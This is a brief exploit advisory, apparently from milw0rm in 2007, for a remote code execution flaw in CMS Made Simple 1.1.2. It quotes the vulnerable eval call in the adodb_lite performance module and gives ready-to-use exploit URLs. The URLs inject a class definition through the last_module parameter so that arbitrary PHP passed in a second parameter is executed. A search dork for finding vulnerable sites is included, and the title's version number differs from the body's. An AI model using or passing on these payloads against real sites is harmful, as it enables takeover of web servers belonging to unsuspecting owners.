CMS Made Simple 1.2 Remote Code Execution Vulnerability.pdf

1 # o [bug] /"*._ _ # 2 # . . . .−*’‘ ‘*−.._.−’/ # 3 # o o < * )) , ( # 4 # . o ‘*−._‘._(__.−−*"‘.\ # 5 # # 6 # vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability # 7 # author: irk4z@yahoo.pl # 8 # download: # 9 # http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple−1.1.2.zip # 10 # dork: "powered by CMS Made Simple version 1.1.2" # 11 # greetz: cOndemned, kacper, str0ke # 12 13 # code: 14 15 /lib/adodb_lite/adodb−perf−module.inc.php: 16 ... 17 eval(’class perfmon_parent_EXTENDER extends ’ . $last_module . ’_ADOConnection { }’); 18 ... 19 20 # exploit: 21 22 http://[site]/[path]/lib/adodb_lite/adodb−perf−module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20 zZz_ADOConnection{}//&w=phpinfo(); 23 http://[site]/[path]/lib/adodb_lite/adodb−perf−module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20 zZz_ADOConnection{}//&w=[ PHPCODE ] 24 25 # milw0rm.com [2007−09−21] Page 1/1 CMS Made Simple 1.2 Remote Code Execution Vulnerability irk4z 09/21/2007